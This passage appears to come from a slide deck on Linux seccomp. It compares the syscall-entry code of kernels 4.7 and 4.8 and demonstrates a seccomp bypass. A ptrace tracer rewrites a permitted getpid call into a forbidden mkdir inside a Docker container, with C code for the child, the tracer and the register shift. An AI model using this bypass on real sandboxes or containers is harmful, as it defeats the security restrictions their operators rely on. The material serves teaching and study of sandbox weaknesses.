    In Linux Kernel 4.7 the calls are made as follows.

        // in Linux Kernel 4.7
        long syscall_trace_enter(struct pt_regs *regs)
        {
            u32 arch = in_ia32_syscall() ? AUDIT_ARCH_I386 : AUDIT_ARCH_X86_64;
            unsigned long phase1_result = syscall_trace_enter_phase1(regs, arch);

            if (phase1_result == 0)
                return regs->orig_ax;
            else
                return syscall_trace_enter_phase2(regs, arch, phase1_result);
        }

        unsigned long syscall_trace_enter_phase1(struct pt_regs *regs, u32 arch)
        {
            ...
            if (IS_ENABLED(CONFIG_DEBUG_ENTRY))
                BUG_ON(regs != task_pt_regs(current));

            work = ACCESS_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY;

            /*
             * Do seccomp first -- it should minimize exposure of other
             * code, and keeping seccomp fast is probably more valuable
             * than the rest of this.
             */
            if (work & _TIF_SECCOMP) {
                struct seccomp_data sd;

                ret = seccomp_phase1(&sd);
                if (ret == SECCOMP_PHASE1_SKIP) {
                    regs->orig_ax = -1;
                    ret = 0;
                } else if (ret != SECCOMP_PHASE1_OK) {
                    return ret;  /* Go directly to phase 2 */
                }
                work &= ~_TIF_SECCOMP;
            }
            ...
            /* Do our best to finish without phase 2. */
            if (work == 0)
                return ret;  /* seccomp and/or nohz only (ret == 0 here) */

    syscall_trace_enter() -> syscall_trace_enter_phase1() -> seccomp_phase1()

    From Linux Kernel 4.8 onward, the tracer is notified through tracehook_report_syscall_entry() before the seccomp check.

        // in Linux Kernel 4.8
        static long syscall_trace_enter(struct pt_regs *regs)
        {
            ...
            if (IS_ENABLED(CONFIG_DEBUG_ENTRY))
                BUG_ON(regs != task_pt_regs(current));
            ...
            if ((emulated || (work & _TIF_SYSCALL_TRACE)) &&
                tracehook_report_syscall_entry(regs))
                return -1L;
            ...
            /*
             * Do seccomp after ptrace, to catch any tracer changes.
             */
            if (work & _TIF_SECCOMP) {
                struct seccomp_data sd;
  30. Bypass Seccomp

    We execute mkdir inside a Docker container in which mkdir is forbidden.

        void attack() {
            int rc;
            // mkdir("dir", 0777);
            // Pass SYS_mkdir and its arguments in the argument slots
            syscall(SYS_getpid, SYS_mkdir, "dir", 0777);
        }

        int main() {
            ...
            switch( (pid = fork()) ) {
            case -1:
                die("Failed fork");
            case 0:
                ptrace(PTRACE_TRACEME, 0, NULL, NULL);
                kill(getpid(), SIGSTOP);
                attack();
                return 0;
            }
            waitpid(pid, 0, 0);
            ...

    1. fork and trace the child process.
    2. In the child, call a permitted syscall (getpid). At this point, pass mkdir and its arguments so that the registers can be adjusted later.
  31. Bypass Seccomp

    The parent process (the tracer) modifies the registers.

        ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
        if (waitpid(pid, &st, __WALL) == -1) {
            break;
        }
        if (!(WIFSTOPPED(st) && WSTOPSIG(st) == SIGTRAP)) {
            break;
        }
        ptrace(PTRACE_GETREGS, pid, NULL, &regs);
        printf("orig_rax = %lld\n", regs.orig_rax);
        if (regs.rax != -ENOSYS) {
            continue;
        }
        if (regs.orig_rax == SYS_getpid) {
            regs.orig_rax = regs.rdi;
            regs.rdi = regs.rsi;
            regs.rsi = regs.rdx;
            regs.rdx = regs.r10;
            regs.r10 = regs.r8;
            regs.r8 = regs.r9;
            regs.r9 = 0;
            ptrace(PTRACE_SETREGS, pid, NULL, &regs);
        }

    3. Resume the child process and read the registers at the moment of the system call.
    4. The orig_rax register holds the system call number, so if it is getpid, change it to mkdir. Because mkdir and its arguments were included in the getpid call, the registers only need to be shifted by one.
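The register shuffle in step 4 can be modelled without ptrace. In the sketch below, `struct syscall_regs` is a hypothetical stand-in for the relevant fields of the x86_64 register set, and the numbers 39 (getpid) and 83 (mkdir) are the x86_64 syscall numbers; everything else follows the assignments shown on the slide.

```c
#include <stdint.h>

/* x86_64 syscall numbers used in this illustration. */
enum { X86_64_NR_getpid = 39, X86_64_NR_mkdir = 83 };

/* Hypothetical stand-in for the syscall-related x86_64 registers. */
struct syscall_regs {
    uint64_t orig_rax;  /* system call number */
    uint64_t rdi, rsi, rdx, r10, r8, r9;  /* arguments 1 to 6 */
};

/*
 * Shifts every argument one slot to the left, so that the first argument
 * becomes the system call number, as the tracer does after the seccomp check.
 */
void shift_syscall_args(struct syscall_regs *regs)
{
    regs->orig_rax = regs->rdi;
    regs->rdi = regs->rsi;
    regs->rsi = regs->rdx;
    regs->rdx = regs->r10;
    regs->r10 = regs->r8;
    regs->r8 = regs->r9;
    regs->r9 = 0;
}
```

Starting from the state produced by `syscall(SYS_getpid, SYS_mkdir, "dir", 0777)`, where orig_rax is 39 and rdi is 83, the shift leaves orig_rax at 83 with the path pointer in rdi and the mode in rsi, which is exactly a mkdir call.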
  32. References

    https://www.kernel.org/doc/html/v.../userspace-api/seccomp_filter.html
    https://man7.org/linux/man-pages/man2/seccomp.2.html
    https://elixir.bootlin.com/linux/latest/source/kernel/seccomp.c
    https://lwn.net/Articles/.../
    https://blog.cloudflare.com/sandboxing-in-linux-with-zero-lines-of-code/
    https://mmi.hatenablog.com/entry/...
    https://ajxchapman.github.io/linux/.../seccomp-and-seccomp-bpf.html